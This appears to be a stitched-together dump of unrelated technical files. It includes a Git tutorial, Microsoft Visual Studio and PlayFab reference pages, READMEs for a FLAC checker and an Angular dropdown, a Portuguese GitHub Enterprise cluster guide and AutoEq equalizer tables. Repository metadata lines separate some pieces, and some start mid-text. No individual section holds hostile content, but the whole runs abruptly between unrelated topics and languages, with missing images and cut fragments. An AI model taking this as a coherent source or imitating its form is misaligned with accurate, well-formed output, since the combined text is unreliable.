### Changed
- Refactored taste.yara `javascript_file` rule for readability (jshlbrd)
- Removed JavaScript files from ScanUrl in the default strelka.yml (jshlbrd)
## 2018-09-26
### Added
- Project went public!
# Introduction-to-Git-and-GitHub
Git is the most popular distributed version control system.
Git is open source and was created by Linus Torvalds, the creator of Linux.
Git allows you to track files and file changes in a repository “repo” (folder).
Everything is stored in local repositories on your computer.
Git tracks modifications to the files that are then stored in GitHub.
Git synchronizes repositories and code between different people.
GitHub is a version control repository and Internet hosting service.
It stores repos and files online. It is like Dropbox for Git repos.
Git and GitHub help to create and manage projects, and more importantly, they allow team members to change and collaborate on the projects.
Links:
* [Link to Git](https://git-scm.com/)
* [Link to Github](https://github.com/)
* [Link to Pro Git book (including Git Basics)](https://git-scm.com/book/en/v2/)
## Download and install Git.
* [Link to Git for Windows](http://git-scm.com/download/win) (follow the default settings)
* **Linux (Debian) command:** `sudo apt-get install git`
Open Git Bash (Windows):

    cd Desktop
    mkdir GitWD
    cd GitWD/

Or, if you are working in a repo you have already cloned:

    cd Desktop/GitWD/yourClonedRepo
**git status --help** Gets help for a particular Git command (here, `status`).
## Setup git on your computer
**git config --global user.name "your name"**
**git config --global user.email "example@gmail.com"**
**git config --list**
Note! You will need to use the same email address for Git and GitHub.

## Git commands
The **git init** command creates a new Git repository.
The **git clone** command (given a URL or path) copies an existing Git repository. (This can either be a repository stored locally on your computer, or one that exists remotely on the GitHub website.)
The **git add .** command tells Git to add all files to a temporary "staging area".
The **git commit -m "updated"** command tells Git to save a snapshot of the files that are currently in the staging area.
Once you have committed your changes, Git will add that snapshot to its history.
In the future, you can revert your code to that particular point in time.
The **git push origin master** command sends all committed changes to the remote repository - GitHub.
The **git status** command gives you a useful summary of the current status of your repository.
The **git log** command will show you a list of all those commits, with a unique ID, a timestamp, and a message.
The **git diff** command will show you a list of all the changes that you have made to your files - compared to the version that you last committed to Git.
The **git pull** command retrieves changes from the remote repository.
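To see how these commands fit together, here is a minimal sketch of the local part of the workflow, run inside a throwaway repository. It assumes `git` is installed; the directory, user name, and email are made-up stand-ins, and the `git push`/`git pull` steps are omitted because they need a remote on GitHub:

```shell
set -e
workdir=$(mktemp -d)            # throwaway directory so nothing real is touched
cd "$workdir"
git init -q demo                # create a new local repository
cd demo
git config user.name "Example User"           # repo-local stand-in for the
git config user.email "example@example.com"   # --global setup shown earlier
echo "# Demo" > README.md
git add .                       # stage all files
git commit -q -m "updated"      # snapshot the staging area
git log --oneline               # one line per commit: unique ID plus message
git status                      # reports a clean working tree after the commit
```

Against a real GitHub repo you would follow this with `git push origin master` (or `main`, depending on the default branch name).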
## Setup GitHub account
Sign up, or sign in if you have an existing account.
* [Link to GitHub](https://github.com/)
## Star, Fork and Clone or Download buttons
* If you like a repo, you can click the **Star** button. Starred repos can be filtered in your GitHub account.
* The **Fork** button copies and saves the repo to your GitHub account. This allows you to collaborate with others on that repository.
* The **Clone or Download** button lets you copy the clone URL or download a zip file.
## Practice exercise 1 Create your first repo in GitHub
Public is the default and it is free, but the content of the repo is available to everyone.
It is better to add a README.md file.
[My solution to exercise 1](exercises/SolutionToExercise1.txt)
## Markdown is a way to style text on the web.
* [Link to Mastering markdown](https://guides.github.com/features/mastering-markdown/)
* [Link to Markdown-Cheatsheet](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet)
## Practice exercise 2 Update your repo
Clone your repo to your computer.
Update README.md locally and push to your remote repository (GitHub).
You do not need to initialize the repo with **git init** if you cloned it to your computer. If you have just started with Git, follow the commands below.
[My solution to exercise 2](exercises/SolutionToExercise2.txt)
## Practice exercise 3 Update and add files to your repo
Update your README.md and add files and folders to your local repository and push to your remote repository (GitHub).
[My solution to exercise 3](exercises/SolutionToExercise3.txt)
##
**To remove repository from GitHub** > Settings > Delete this repository > Type repository name
##
If you find any typos, please let me know. Thanks!
---
title: 'Walkthrough: Missing Objects Due to a Misconfigured Pipeline | Microsoft Docs'
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.technology: vs-ide-debug
ms.topic: conceptual
ms.assetid: ed8ac02d-b38f-4055-82fb-67757c2ccbb9
caps.latest.revision: 16
author: MikeJo5000
ms.author: mikejo
manager: jillfra
ms.openlocfilehash: 9d74006051fd39043de75cec81fdad3f1083adef
ms.sourcegitcommit: 47eeeeadd84c879636e9d48747b615de69384356
ms.translationtype: HT
ms.contentlocale: es-ES
ms.lasthandoff: 04/23/2019
ms.locfileid: "63444284"
---
# <a name="walkthrough-missing-objects-due-to-misconfigured-pipeline"></a>Walkthrough: Missing Objects Due to a Misconfigured Pipeline
[!INCLUDE[vs2017banner](../includes/vs2017banner.md)]
This walkthrough demonstrates how to use the [!INCLUDE[vsprvs](../includes/vsprvs-md.md)] Graphics Diagnostics tools to investigate an object that is missing as a result of an unset pixel shader.
This walkthrough illustrates the following tasks:
- Using the **Graphics Event List** to find potential sources of the problem.
- Using the **Graphics Pipeline Stages** window to examine the effect of the `DrawIndexed` Direct3D API call.
- Examining the device context to confirm that a shader stage was not set.
- Using the **Graphics Pipeline Stages** window together with the **Graphics Event Call Stack** to help find the source of the unset pixel shader.
## <a name="scenario"></a>Scenario
When an object is missing in a 3D app, it is sometimes because one of its shader stages was not set before the object was rendered. In apps that have simple rendering needs, the source of this kind of error is typically located somewhere in the call stack of the object's draw call. However, as an optimization, some apps batch together objects that have shader programs, textures, or other data in common to minimize the overhead of changing state. In these apps, the source of the error might be located in the batching system rather than in the draw call's call stack. The scenario in this walkthrough demonstrates an app that has simple rendering needs, and the source of the error can therefore be found in the call stack.
In this scenario, when you run the app to test it, the background is rendered as expected, but one of the objects does not appear. By using Graphics Diagnostics, you can capture the problem to a graphics log so that you can debug the app. Here's what the problem looks like in the app:
![The sample app, with a missing object](../debugger/media/gfx-diag-demo-misconfigured-pipeline-problem.png "gfx_diag_demo_misconfigured_pipeline_problem")
## <a name="investigation"></a>Investigation
By using the Graphics Diagnostics tools, you can load the graphics log document to inspect the frames that were captured during the test.
#### <a name="to-examine-a-frame-in-a-graphics-log"></a>To examine a frame in a graphics log
1. In [!INCLUDE[vsprvs](../includes/vsprvs-md.md)], load a graphics log document that contains a frame that demonstrates the missing object. A new graphics log tab appears in [!INCLUDE[vsprvs](../includes/vsprvs-md.md)]. In the top part of this tab is the render target output of the selected frame. In the bottom part is the **Frame List**, which displays each captured frame as a thumbnail image.
2. In the **Frame List**, select a frame that demonstrates that the object isn't displayed. The render target is updated to reflect the selected frame. In this scenario, here's what the graphics log tab looks like:
    ![The graphics log document and the relevant frame](../debugger/media/gfx-diag-demo-misconfigured-pipeline-log.png "gfx_diag_demo_misconfigured_pipeline_log")
After you select a frame that demonstrates the problem, you can begin to diagnose it by using the **Graphics Event List**. The **Graphics Event List** contains every Direct3D API call that was made to render the active frame; for example, calls to set device state, to create and update buffers, and to draw objects that appear in the frame. Many kinds of calls (for example, Draw, Dispatch, Copy, or Clear calls) are interesting because there is often (but not always) a corresponding change in the render target when the app behaves as expected. Draw calls are particularly interesting because each one represents geometry that the app rendered.
Because you know that the render target doesn't contain the missing object, but also that no other errors seem to appear, you can use the **Graphics Event List** together with the **Graphics Pipeline Stages** tool to determine which draw call corresponds to the missing object's geometry. The **Graphics Pipeline Stages** window displays the geometry that was sent to each draw call, regardless of its effect on the render target. As you move through the draw calls, the pipeline stages are updated to display the geometry that's associated with each call as it flows through each enabled stage, and the target output is updated to show the state of the render target after the call is completed.
#### <a name="to-find-the-draw-call-for-the-missing-geometry"></a>To find the draw call for the missing geometry
1. Open the **Graphics Event List** window. On the **Graphics Diagnostics** toolbar, choose **Event List**.
2. Open the **Graphics Pipeline Stages** window. On the **Graphics Diagnostics** toolbar, choose **Pipeline Stages**.
3. As you move through each draw call in the **Graphics Event List** window, watch the **Graphics Pipeline Stages** window for the missing object. To make this easier, type "Draw" into the **Search** box in the upper-right corner of the **Graphics Event List** window. This filters the list so that it includes only the events that have the word "Draw" in their titles.
    In the **Graphics Pipeline Stages** window, the **Input Assembler** stage shows the object's geometry before it's transformed, and the **Vertex Shader** stage shows the same object after it's transformed. In this scenario, notice that for one of the draw calls, the **Graphics Pipeline Stages** window shows the **Input Assembler** and **Vertex Shader** stages, but not the **Pixel Shader** stage.
    > [!NOTE]
    > If other pipeline stages (for example, the hull shader, domain shader, or geometry shader stages) process the object, any of them could be the cause of the problem. Usually, the problem is related to the first stage that no longer displays the result or that displays it in an unexpected way.
4. Stop when you reach the draw call that corresponds to the missing object. In this scenario, the **Graphics Pipeline Stages** window indicates that the geometry was issued to the GPU (indicated by the presence of the **Input Assembler** stage) and that it was transformed (indicated by the **Vertex Shader** stage), but it doesn't appear on the render target because there doesn't seem to be an active pixel shader (indicated by the absence of the **Pixel Shader** stage). In this scenario, you can even see the silhouette of the missing object in the **Output Merger** stage:

After you confirm that the app issued a draw call for the missing object's geometry, and you discover that the pixel shader stage was inactive, you can examine the device state to confirm your findings. You can use the **Graphics Object Table** to examine the device context and other Direct3D object data.
#### <a name="to-examine-device-context"></a>To examine the device context
1. Open the **D3D11 Device Context**. In the **Graphics Pipeline Stages** window, choose the **ID3D11DeviceContext** link that's part of the `DrawIndexed` call displayed at the top of the window.
2. Examine the device state displayed in the **D3D11 Device Context** to confirm that no pixel shader was active during the draw call. In this scenario, the **Shader Overview**, which appears below the **Pixel Shader State**, indicates that the shader is **NULL**:

After you confirm that your app set the pixel shader to NULL, the next step is to find the location in the app's source code where the shader is set. You can use the **Graphics Event List** together with the **Graphics Event Call Stack** to find this location.
#### <a name="to-find-where-the-pixel-shader-is-set-in-your-apps-source-code"></a>To find where the pixel shader is set in your app's source code
1. Find the `PSSetShader` call that corresponds to the missing object. In the **Graphics Event List** window, type "Draw;PSSetShader" in the **Search** box in the upper-right corner of the **Graphics Event List** window. This filters the list so that it includes only the "PSSetShader" events and the events that have "Draw" in their titles. Choose the first `PSSetShader` call that appears before the draw call for the missing object.
> [!NOTE]
> `PSSetShader` won't appear in the **Graphics Event List** window if it wasn't set during this frame. Typically, this happens only when one pixel shader is used for all objects, or when the `PSSetShader` call was unintentionally omitted during this frame. In either case, we recommend that you search your app's source code for `PSSetShader` calls and use traditional debugging techniques to examine the behavior of those calls.
2. Open the **Graphics Event Call Stack** window. On the **Graphics Diagnostics** toolbar, choose **Event Call Stack**.
3. Use the call stack to find the `PSSetShader` call in your app's source code. In the **Graphics Event Call Stack** window, choose the top-most call and examine the value that the pixel shader is set to. The pixel shader might be set to NULL directly, or the NULL value might come from an argument that was passed to the function or from other state. If it's not set directly, you might find the source of the NULL value somewhere higher up the call stack. In this scenario, you'll discover that the pixel shader is set directly to `nullptr` in the top-most function, which is named `CubeRenderer::Render`:

> [!NOTE]
> If you don't find the source of the NULL value by examining the call stack, we recommend that you set a conditional breakpoint on the `PSSetShader` call so that program execution breaks when the pixel shader is set to NULL. Then restart the app under the debugger and use traditional debugging techniques to find the source of the NULL value.
To fix the problem, assign the correct pixel shader by using the first parameter of the `ID3D11DeviceContext::PSSetShader` API call.
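A minimal sketch of that fix follows; the `m_d3dContext` and `m_pixelShader` member names are assumptions for illustration, not names taken from this walkthrough:

```cpp
// Bug: no pixel shader is bound, so the draw call produces no pixels.
m_d3dContext->PSSetShader(nullptr, nullptr, 0);

// Fix: bind the pixel shader through the first parameter of PSSetShader.
m_d3dContext->PSSetShader(m_pixelShader.Get(), nullptr, 0);
```

The second and third parameters (class instances and their count) stay unchanged; only the first parameter determines which pixel shader is active.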

After you correct the code, you can rebuild it and run the app again to verify that the rendering problem is resolved:

---
title: VSPackages and the managed package framework | Microsoft Docs
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.technology: devlang-csharp
ms.topic: conceptual
helpviewer_keywords:
- managed package framework
- VSPackages, managed package framework
- managed VSPackages, managed package framework
ms.assetid: e8d80e0f-6b5b-4baf-a7df-59fd808c60cd
caps.latest.revision: 16
manager: jillfra
ms.openlocfilehash: 5b72b2c3bd6b03d1d3f3e50135c2ddf4758a4bd9
ms.sourcegitcommit: 08fc78516f1107b83f46e2401888df4868bb1e40
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 05/15/2019
ms.locfileid: "65683054"
---
# <a name="vspackages-and-the-managed-package-framework"></a>VSPackages and the Managed Package Framework
You can reduce development time by building your VSPackage with the managed package framework (MPF) classes instead of the COM interop classes.
There are two ways to create a managed VSPackage:
- Use the [!INCLUDE[vsprvs](../includes/vsprvs-md.md)] package project template
For more information, see [Walkthrough: Creating a Menu Command by Using the Visual Studio Package Template](https://msdn.microsoft.com/library/1985fa7d-aad4-4866-b356-a125b6a246de).
- Build the VSPackage without the [!INCLUDE[vsprvs](../includes/vsprvs-md.md)] package project template
For example, you can copy a sample VSPackage and change its GUIDs and names. You can find samples in the VSX section of the [Code Gallery](http://code.msdn.microsoft.com/vsx/).
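For orientation, a minimal managed VSPackage built on the MPF looks roughly like the following C# sketch. The class name and GUID are placeholders, and the exact attribute set varies by Visual Studio version:

```csharp
using System.Runtime.InteropServices;
using Microsoft.VisualStudio.Shell;

// Placeholder GUID; a real package must declare its own unique GUID.
[PackageRegistration(UseManagedResourcesOnly = true)]
[Guid("00000000-0000-0000-0000-000000000000")]
public sealed class MyFirstPackage : Package
{
    // Called after the package is sited in the IDE.
    protected override void Initialize()
    {
        base.Initialize();
    }
}
```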
## <a name="in-this-section"></a>In This Section
[Managed Package Framework Classes](../misc/managed-package-framework-classes.md)
Describes and lists the DLL files and the MPF class namespaces.
## <a name="related-sections"></a>Related Sections
[Walkthrough: Creating a Menu Command by Using the Visual Studio Package Template](https://msdn.microsoft.com/library/1985fa7d-aad4-4866-b356-a125b6a246de)
Describes how to create a managed VSPackage.
[Managed VSPackages](../misc/managed-vspackages.md)
Describes the aspects of VSPackages that are specific to managed code.
---
author: jdeweyMSFT
title: "PartyDestroyChatControlCompletedStateChange"
description: "Information specific to the *DestroyChatControlCompleted* type of state change."
ms.author: jdewey
ms.topic: reference
ms.prod: playfab
ms.date: 09/26/2019
---
# PartyDestroyChatControlCompletedStateChange
Information specific to the *DestroyChatControlCompleted* type of state change.
## Syntax
```cpp
typedef struct PartyDestroyChatControlCompletedStateChange {
PartyStateChangeResult result;
PartyError errorDetail;
PartyLocalDevice* localDevice;
PartyLocalChatControl* localChatControl;
void* asyncIdentifier;
} PartyDestroyChatControlCompletedStateChange
```
### Members
**`result`** [PartyStateChangeResult](../enums/partystatechangeresult.md)
Indicates that the chat control destruction operation succeeded or provides the reason that it failed.
**`errorDetail`** PartyError
A diagnostic value providing additional troubleshooting information regarding any potential error condition.
The human-readable form of this error detail can be retrieved via [PartyManager::GetErrorMessage()](../classes/PartyManager/methods/partymanager_geterrormessage.md).
**`localDevice`** [PartyLocalDevice](../classes/PartyLocalDevice/partylocaldevice.md)*
The local device used in the call associated with this state change.
**`localChatControl`** [PartyLocalChatControl](../classes/PartyLocalChatControl/partylocalchatcontrol.md)*
The chat control that was destroyed.
The memory remains valid until this state change is returned.
**`asyncIdentifier`** void*
The async identifier provided to the call associated with this state change.
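This state change is consumed from the standard Party state-change processing loop. The following C++ fragment is an illustrative sketch (error handling trimmed), not code taken from the PlayFab samples:

```cpp
#include <Party.h>
using namespace Party;

// Sketch: drain queued state changes once per frame and react to this one.
void ProcessStateChanges()
{
    uint32_t count;
    PartyStateChangeArray changes;
    if (PARTY_FAILED(PartyManager::GetSingleton().StartProcessingStateChanges(&count, &changes)))
    {
        return;
    }

    for (uint32_t i = 0; i < count; ++i)
    {
        const PartyStateChange* change = changes[i];
        if (change->stateChangeType == PartyStateChangeType::DestroyChatControlCompleted)
        {
            auto stateChange = static_cast<const PartyDestroyChatControlCompletedStateChange*>(change);
            if (stateChange->result != PartyStateChangeResult::Succeeded)
            {
                // stateChange->errorDetail can be converted to text with
                // PartyManager::GetErrorMessage() for logging.
            }
        }
    }

    // Return the state changes to the library when you're done with them.
    PartyManager::GetSingleton().FinishProcessingStateChanges(count, changes);
}
```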
## Requirements
**Header:** Party.h
## See also
[Party members](../party_members.md)
[PartyLocalDevice::DestroyChatControl](../classes/PartyLocalDevice/methods/partylocaldevice_destroychatcontrol.md)
---
layout: project_single
title: "100 Layer Cake — Movie-Inspired Wedding Ideas"
slug: "100-layer-cake-movie-inspired-wedding-ideas"
parent: "beautiful-wes-anderson-decor-ideas"
---
Dinner Menu (via This Beautiful Wes Anderson-Inspired Wedding Is One Of A Kind) #refinery29
# bash-flac-diag
This is a simple bash script for Linux to test [FLAC audio files](https://en.wikipedia.org/wiki/FLAC) recursively and generate logs with good files (no errors found) and bad ones (at least one error found). The script tests flac files with the help of [flac cli encoder/decoder](https://xiph.org/flac/documentation_tools_flac.html), which detects errors in the stream and when
> the MD5 signature of the decoded audio does not match the stored MD5 signature, even when the bitstream is valid.
This tool is meant to be used to identify corrupted flac files that should be deleted from an audio library, for example. Here's a demo of it:
<p align="center">
<a href="https://youtu.be/tPYSjBmLUFs"><img src="img/demo-slow.gif"></a>
</p>
# Requisites
* [**flac cli**](https://xiph.org/flac/download.html). Most distributions have a flac package.
* **Standard Linux packages**. (If you're running a mainstream distro, you don't need to worry about installing any one of them.)
When running **`flac_diag.sh`**, the script will attempt to detect all necessary programs and if there's one missing, you'll see a message about it. Make sure that if they're installed, they're also in your user's `$PATH`.
# Installation
I've only tested this script with Debian and Ubuntu but it probably works just fine with any other standard Linux distro.
## Debian/Ubuntu
* Via git
```
sudo apt update
sudo apt install git -yy
cd /opt
sudo git clone https://github.com/cgomesu/bash-flac-diag.git
sudo chmod +x bash-flac-diag/ -R
cd bash-flac-diag/
./install.sh
```
* Via github cli
```
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-key C99B11DEB97541F0
sudo apt-add-repository https://cli.github.com/packages
sudo apt update
sudo apt install gh
cd /opt
sudo gh repo clone cgomesu/bash-flac-diag
sudo chmod +x bash-flac-diag/ -R
cd bash-flac-diag/
./install.sh
```
# Usage
To scan and test all flac files inside a music folder recursively, simply run the script adding the **`/full/path/to/music/folder/`** as argument, as follows:
`./flac_diag.sh /path/to/music/folder/`
or
`bash flac_diag.sh /path/to/music/folder/`
The script will create a `./log` subfolder with two log files, namely `bad_flacs.log` and `good_flacs.log`. The former has a list with the path of each .flac file that produced at least one error when running the `flac` utility in test mode, while the latter has a list with the path of each .flac file that produced no errors. A detailed description of the errors produced by each file is stored in `./log/errors/` for debugging.
*(Optional: If you wish to create a log file with the output of the `flac_diag.sh` script, you can simply redirect the output to a file of your preference. For example, to output to a file called `output-10-06-2020.log`, simply run `bash flac_diag.sh /path/to/music/folder/ > output-10-06-2020.log`.)*
In most cases, after testing all .flac files, you'd want to:
1. Double check a few files in `bad_flacs.log`, to make sure they are actually corrupted;
2. Make a backup of the current `bad_flacs.log` files;
3. Attempt to fix the files in `bad_flacs.log` by re-enconding them; then manually recheck the files or clean the `bad_flacs.log` and re-run the `flac_diag.sh` script;
4. Then if re-encoding doesn't work as expected, remove all files in `bad_flacs.log` from your music folder.
## Fixing bad flac files
To attempt to fix the bad .flac files, you can use a tool in the `./tools` subfolder called **`bad_flac_fixer.sh`**, which takes a `bad_flacs.log` as argument and overwrites every single file listed in there with a re-encoded version of it. To fix all files listed in `./log/bad_flacs.log`, run the following from the git root folder:
`./tools/bad_flac_fixer.sh log/bad_flacs.log` or `bash tools/bad_flac_fixer.sh log/bad_flacs.log`
**Make a backup of your `bad_flacs.log`**, delete/clean the old `./log/bad_flacs.log`, and re-run the `flac_diag.sh` script. If the errors persist, I suggest to remove the bad files.
## Removing bad flac files
To remove the bad .flac files, you can use a tool in the `./tools` subfolder called **`bad_flac_remover.sh`**, which takes a `bad_flacs.log` as argument and deletes every single file listed in there. To delete all files listed in `./log/bad_flacs.log`, run the following from the git root folder:
`./tools/bad_flac_remover.sh log/bad_flacs.log` or `bash tools/bad_flac_remover.sh log/bad_flacs.log`
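The core of such a remover can be sketched as a small POSIX shell function. The function name `remove_listed` is a hypothetical name for illustration; the real `tools/bad_flac_remover.sh` may differ in details:

```shell
#!/bin/sh
# Sketch: delete every file listed (one path per line) in a bad_flacs.log-style file.
remove_listed() {
  log="$1"
  while IFS= read -r path; do
    # Only delete regular files that still exist.
    if [ -f "$path" ]; then
      rm -- "$path"
    fi
  done < "$log"
}
```

Back up the log first; anything listed in it is deleted without confirmation.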
9a62f404911c32b892087e8487fdba984693834f | 4,991 | md | Markdown | translations/pt-BR/content/admin/enterprise-management/initializing-the-cluster.md | lukmangrd/lukman- | 3c608c1e3e9c374f3260016d4a32fd453532cac0 | [
"CC-BY-4.0",
"MIT"
] | 9 | 2021-04-02T15:46:42.000Z | 2022-03-06T17:21:45.000Z | translations/pt-BR/content/admin/enterprise-management/initializing-the-cluster.md | lukmangrd/lukman- | 3c608c1e3e9c374f3260016d4a32fd453532cac0 | [
"CC-BY-4.0",
"MIT"
] | 52 | 2022-01-28T19:09:04.000Z | 2022-03-30T18:16:41.000Z | translations/pt-BR/content/admin/enterprise-management/initializing-the-cluster.md | erik-888/docs | 2e78dc37bc875b4df09986b152a56129ace3d62d | [
"CC-BY-4.0",
"MIT"
---
title: Inicializar o cluster
intro: 'Um cluster do {% data variables.product.prodname_ghe_server %} deve ser configurado com uma licença e inicializado usando o shell administrativo (SSH).'
redirect_from:
- /enterprise/admin/clustering/initializing-the-cluster
- /enterprise/admin/enterprise-management/initializing-the-cluster
versions:
enterprise-server: '*'
---
{% data reusables.enterprise_clustering.clustering-requires-https %}
### Instalar o {% data variables.product.prodname_ghe_server %}
1. Em cada nó de cluster, provisione e instale o {% data variables.product.prodname_ghe_server %}. Para obter mais informações, consulte "[Configurar uma instância do {% data variables.product.prodname_ghe_server %}](/enterprise/{{ currentVersion }}/admin/guides/installation/setting-up-a-github-enterprise-server-instance)".
2. Usando o shell administrativo ou DHCP, configure **somente** o endereço IP de cada nó. Não altere outras configurações.
### Configurar o primeiro nó
1. Conecte-se ao nó que será designado como principal no MySQL no `cluster.conf`. Para obter mais informações, consulte "[Sobre o arquivo de configuração do cluster](/enterprise/{{ currentVersion }}/admin/guides/clustering/initializing-the-cluster/#about-the-cluster-configuration-file)".
2. No navegador, acesse `https://<ip address>:8443/setup/`.
{% data reusables.enterprise_installation.upload-a-license-file %}
{% data reusables.enterprise_installation.save-settings-in-web-based-mgmt-console %}
{% data reusables.enterprise_installation.instance-will-restart-automatically %}
### Inicializar o cluster
Para inicializar o cluster, você precisa de um arquivo de configuração de cluster (`cluster.conf`). Para obter mais informações, consulte “[Sobre o arquivo de configuração do cluster](/enterprise/{{ currentVersion }}/admin/guides/clustering/initializing-the-cluster/#about-the-cluster-configuration-file)".
1. Desde o primeiro nó configurado, execute `ghe-cluster-config-init`. Essa ação inicializará o cluster caso haja nós no arquivo de configuração que não estão configurados.
2. Execute `ghe-cluster-config-apply`. Fazer isso vai validar o arquivo `cluster.conf`, aplicar a configuração a cada arquivo de nó e ativar os serviços configurados em cada nó.
Para verificar o status de um cluster em execução, use o comando `ghe-cluster-status`.
### Sobre o arquivo de configuração do cluster
O arquivo de configuração do cluster (`cluster.conf`) define os nós no cluster e os serviços que cada nó executa. Para obter mais informações, consulte "[Sobre os nós do cluster](/enterprise/{{ currentVersion }}/admin/guides/clustering/about-cluster-nodes)."
O exemplo `cluster.conf` define um cluster com cinco nós.
- Dois nós (chamados `ghe-app-node-\*`) executam os serviços `web-server` e `job-server` responsáveis por responder às solicitações do cliente.
- Três nós (chamados `ghe-data-node-\*`) executam o serviço de armazenamento e recuperação de dados do {% data variables.product.prodname_ghe_server %}.
Os nomes dos nós podem ser qualquer nome de host válido. Cada nome é definido como nome de host e será adicionado a `/etc/hosts` em cada nó. Assim, os nós podem ser resolvidos localmente entre si.
Especifique o primeiro nó do cluster que você configurou como principal do MySQL via `mysql-server` e `mysql-master`.
```ini
[cluster]
mysql-master = ghe-data-node-1
redis-master = ghe-data-node-1
primary-datacenter = default
[cluster "ghe-app-node-1"]
hostname = ghe-app-node-1
ipv4 = 192.168.0.2
# ipv6 = fd12:3456:789a:1::2
web-server = true
job-server = true
[cluster "ghe-app-node-2"]
hostname = ghe-app-node-2
ipv4 = 192.168.0.3
# ipv6 = fd12:3456:789a:1::3
web-server = true
job-server = true
[cluster "ghe-data-node-1"]
hostname = ghe-data-node-1
ipv4 = 192.168.0.4
# ipv6 = fd12:3456:789a:1::4
consul-server = true
consul-datacenter = default
git-server = true
pages-server = true
mysql-server = true
elasticsearch-server = true
redis-server = true
memcache-server = true
metrics-server = true
storage-server = true
[cluster "ghe-data-node-2"]
hostname = ghe-data-node-2
ipv4 = 192.168.0.5
# ipv6 = fd12:3456:789a:1::5
consul-server = true
consul-datacenter = default
git-server = true
pages-server = true
mysql-server = true
elasticsearch-server = true
redis-server = true
memcache-server = true
metrics-server = true
storage-server = true
[cluster "ghe-data-node-3"]
hostname = ghe-data-node-3
ipv4 = 192.168.0.6
# ipv6 = fd12:3456:789a:1::6
consul-server = true
consul-datacenter = default
git-server = true
pages-server = true
mysql-server = true
elasticsearch-server = true
redis-server = true
memcache-server = true
metrics-server = true
storage-server = true
```
Create the `/data/user/common/cluster.conf` file on the first node you configured. For example, using `vim`:
```shell
ghe-data-node-1:~$ sudo vim /data/user/common/cluster.conf
```
# angular-dropdown-element
[AngularElement](https://angular.io/guide/elements) dropdown
## Demo
* Javascript - https://jsfiddle.net/Akhlesh/0jmdrzvh/
* React - https://jsfiddle.net/Akhlesh/fvswda9L/
## Installation
```bash
$ npm install angular-dropdown-element bootstrap
```
## Usage
```html
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Angular Dropdown Element</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
</head>
<body>
<div class="container">
<ng-dropdown-element label="name"></ng-dropdown-element>
</div>
<script src="node_modules/ng-dropdown-element/index.js"></script>
<script>
var items = Array.from({ length: 50 }, (e, i) => ({ name: 'test name ' + i }));
const el = document.querySelector('ng-dropdown-element');
el.items = items;
el.addEventListener('valueChange', (e) => console.log(e.detail));
</script>
</body>
</html>
```
## Dropdown input/outputs
| Input/Output | Description |
| --- | --- |
| items | array: the list of items |
| value | item: the dropdown value |
| label | string or function: used to get the label value |
| placeholder | string: placeholder text. Default: 'Please select an item' |
| valueChange | function: called on value change |
| itemRenderer | function: returns the HTML template for an item |
9a63ef8db5287e8db155ea8fa66b9db32d2f3034 | 1,543 | md | Markdown | results/crinacle/harman_in-ear_2019v2/Audeze iSINE 20/README.md | eliMakeouthill/AutoEq | b16c72495b3ce493293c6a4a4fdf45a81aec9ca0 | [
"MIT"
] | 3 | 2022-02-25T08:33:08.000Z | 2022-03-13T11:27:29.000Z | results/crinacle/harman_in-ear_2019v2/Audeze iSINE 20/README.md | billclintonwong/AutoEq | aa25ed8e8270c523893fadbda57e9811c65733f1 | [
"MIT"
] | null | null | null | results/crinacle/harman_in-ear_2019v2/Audeze iSINE 20/README.md | billclintonwong/AutoEq | aa25ed8e8270c523893fadbda57e9811c65733f1 | [
"MIT"
# Audeze iSINE 20
See [usage instructions](https://github.com/jaakkopasanen/AutoEq#usage) for more options and info.
### Parametric EQs
In case of using parametric equalizer, apply preamp of **-7.3dB** and build filters manually
with these parameters. The first 5 filters can be used independently.
When using independent subset of filters, apply preamp of **-7.2dB**.
| Type | Fc | Q | Gain |
|:--------|:---------|:-----|:--------|
| Peaking | 28 Hz | 0.46 | 5.0 dB |
| Peaking | 791 Hz | 0.31 | -5.3 dB |
| Peaking | 1508 Hz | 1.22 | -7.5 dB |
| Peaking | 2376 Hz | 1.14 | 11.5 dB |
| Peaking | 4975 Hz | 1.45 | 5.5 dB |
| Peaking | 479 Hz | 2.43 | 0.8 dB |
| Peaking | 831 Hz | 5.51 | -1.5 dB |
| Peaking | 6180 Hz | 7.09 | 1.7 dB |
| Peaking | 8671 Hz | 2.22 | -1.9 dB |
| Peaking | 17767 Hz | 0.31 | 1.0 dB |
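If you prefer to apply these rows in software rather than in a GUI equalizer, each table row maps onto a standard peaking biquad. The sketch below uses the Audio-EQ-Cookbook (RBJ) formulas and assumes a 48 kHz sample rate; it is illustrative, not code from AutoEq itself:

```python
import cmath
import math

def peaking_biquad(fc, q, gain_db, fs=48000):
    """RBJ-cookbook peaking-EQ biquad for one table row (fc in Hz, gain in dB)."""
    a_lin = 10 ** (gain_db / 40)
    w0 = 2 * math.pi * fc / fs
    alpha = math.sin(w0) / (2 * q)
    b = [1 + alpha * a_lin, -2 * math.cos(w0), 1 - alpha * a_lin]
    a = [1 + alpha / a_lin, -2 * math.cos(w0), 1 - alpha / a_lin]
    return b, a

def gain_at(f, b, a, fs=48000):
    """Magnitude response of the biquad at frequency f."""
    z = cmath.exp(-2j * math.pi * f / fs)
    return abs((b[0] + b[1] * z + b[2] * z * z) /
               (a[0] + a[1] * z + a[2] * z * z))

# First row of the parametric table above: 28 Hz, Q 0.46, +5.0 dB.
b, a = peaking_biquad(28, 0.46, 5.0)
print(round(20 * math.log10(gain_at(28, b, a)), 2))  # → 5.0
```

A quick sanity check for any implementation: the gain at `Fc` equals the table's dB value, and the response returns to unity at DC.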
### Fixed Band EQs
In case of using fixed band (also called graphic) equalizer, apply preamp of **-8.7dB**
(if available) and set gains manually with these parameters.
| Type | Fc | Q | Gain |
|:--------|:---------|:-----|:--------|
| Peaking | 31 Hz | 1.41 | 5.5 dB |
| Peaking | 62 Hz | 1.41 | 2.1 dB |
| Peaking | 125 Hz | 1.41 | -0.2 dB |
| Peaking | 250 Hz | 1.41 | -2.6 dB |
| Peaking | 500 Hz | 1.41 | -2.6 dB |
| Peaking | 1000 Hz | 1.41 | -8.9 dB |
| Peaking | 2000 Hz | 1.41 | 1.4 dB |
| Peaking | 4000 Hz | 1.41 | 8.3 dB |
